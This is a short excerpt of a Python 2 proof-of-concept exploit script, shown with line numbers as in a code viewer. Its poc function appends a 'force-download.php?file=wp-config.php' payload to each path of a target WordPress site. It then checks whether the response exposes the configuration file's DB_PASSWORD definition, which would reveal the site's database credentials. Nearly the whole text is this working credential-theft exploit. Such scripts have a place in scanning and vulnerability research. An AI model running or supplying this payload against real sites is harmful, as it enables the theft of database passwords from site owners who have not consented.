(url)
| 24 | |
| 25 | |
| 26 | def poc(url): |
| 27 | if '://' not in url: |
| 28 | url = 'http://' + url |
| 29 | payload = '/force-download.php?file=wp-config.php' |
| 30 | for i in iterate_path(url): |
| 31 | if '?' in i: |
| 32 | continue |
| 33 | target = i.rstrip('/') + payload |
| 34 | try: |
| 35 | r = urllib2.urlopen(target).read() # cannot use requests here |
| 36 | if 'define(' in r and 'DB_PASSWORD' in r: |
| 37 | return target |
| 38 | except Exception, e: |
| 39 | pass |
| 40 | return False |
nothing calls this directly
no test coverage detected